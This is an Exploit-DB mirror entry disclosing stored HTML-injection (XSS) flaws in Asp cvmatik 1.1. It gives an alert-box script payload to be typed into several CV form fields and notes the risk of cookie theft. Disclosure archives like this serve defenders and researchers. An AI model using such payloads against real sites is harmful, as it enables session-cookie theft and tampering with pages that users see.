exploit-db-mirror/exploits/asp/webapps/30331.html
Offensive Security b4c96a5864 DB: 2021-09-03
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

28 lines
No EOL
895 B
HTML

source: https://www.securityfocus.com/bid/25008/info
Asp cvmatik is prone to multiple HTML-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in dynamically generated content.
Attacker-supplied HTML and script code would execute in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user; other attacks are also possible.
Asp cvmatik 1.1 is vulnerable.
<html><head></head><body>1-http://www.example.com/cv.asp
You write xss code in page's text box
Adý <script>alert("G3");</script>
or
Soyadý<script>alert("G3");</script>
or
Ehliyet <script>alert("G3");</script>
or
Askerlik <script>alert("G3");</script>
or
GSM <script>alert("G3");</script>
etc...
Press to "tamam"(ok) button.
2-next page
</body></html>